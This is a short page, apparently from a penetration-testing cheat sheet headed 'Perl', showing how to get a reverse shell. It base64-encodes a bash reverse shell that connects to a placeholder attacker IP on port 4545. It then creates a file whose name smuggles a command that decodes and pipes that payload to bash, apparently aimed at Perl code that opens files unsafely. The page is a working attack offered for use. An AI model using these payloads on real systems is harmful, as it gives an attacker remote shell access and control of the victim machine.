Page cover
For the complete documentation index, see llms.txt. This page is also available as Markdown.

Perl

## ------------------| Create rev shell ( remove + and == )
echo -n 'bash  -i >& /dev/tcp/<IP>/4545 0>&1' | base64 -w 0

## ------------------| Create file
touch -- '| echo YmFzaCAgLW|base64 -d|bash;'

Last updated